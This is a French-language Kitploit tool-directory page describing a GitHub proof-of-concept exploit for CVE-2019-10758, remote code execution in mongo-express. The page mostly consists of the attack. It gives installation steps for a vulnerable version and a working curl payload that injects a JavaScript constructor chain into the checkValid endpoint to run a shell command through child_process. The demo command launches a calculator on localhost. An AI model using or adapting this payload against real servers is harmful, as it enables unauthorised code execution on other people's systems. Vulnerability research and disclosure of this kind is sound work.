Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2019-10758 — Exploit de preuve de concept pour CVE-2019-10758, démontrant l'exécution de code à distance dans mongo-express via une injection de document contrefait. Inclut des charges utiles curl et basées sur des scripts. | Kitploit
Outils/GitHubGitHub/masahiro331/cve-2019-10758
Génération de PayloadsAnalyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'Intrusion
GitHubmasahiro331/cve-2019-10758

CVE-2019-10758

Exploit de preuve de concept pour CVE-2019-10758, démontrant l'exécution de code à distance dans mongo-express via une injection de document contrefait. Inclut des charges utiles curl et basées sur des scripts.

Voir le dépôt
111213il y a 6 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2019-10758 Preuve de concept

Installation

root@kitploit:~
docker run -p 27017:27017 -d mongo
npm install [email protected] 
cd node_modules/mongo-express/ && node app.js

Exploit cURL

root@kitploit:~
curl 'http://localhost:8081/checkValid' -H 'Authorization: Basic YWRtaW46cGFzcw=='  --data 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("/Applications/Calculator.app/Contents/MacOS/Calculator")'

Exploit de script

root@kitploit:~
node main.js
Télécharger l’outil